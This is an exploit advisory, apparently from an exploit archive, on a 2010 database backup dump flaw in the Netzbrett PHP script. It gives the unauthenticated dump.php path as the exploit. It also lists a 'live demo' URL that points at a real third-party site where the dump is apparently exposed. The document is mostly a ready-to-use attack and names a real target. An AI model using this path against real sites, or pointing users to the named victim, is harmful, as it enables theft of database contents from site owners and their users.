id: 10935
date: 02/15/2010
title: Netzbrett Database Backup Dump Vulnerability
author: ViRuSMaN
cves: 

============================================
Netzbrett Database Backup Dump Vulnerability
============================================

===[ Live Demo ]===
    [»] http://www.tischtennis-bsc.de/netzbrett/dump.php
==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] Netzbrett Database Backup Dump Vulnerability
==============================================================================

    [»] Script:             [ Netzbrett ]
    [»] Language:           [ PHP ]
    [»] Download:           [ http://www.sfr-fresh.com/unix/www/old/netzbrett.zip ]
    [»] Founder:            [ ViRuSMaN ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/dump.php



Author: ViRuSMaN <-




#  0day.today [2023-03-24]  #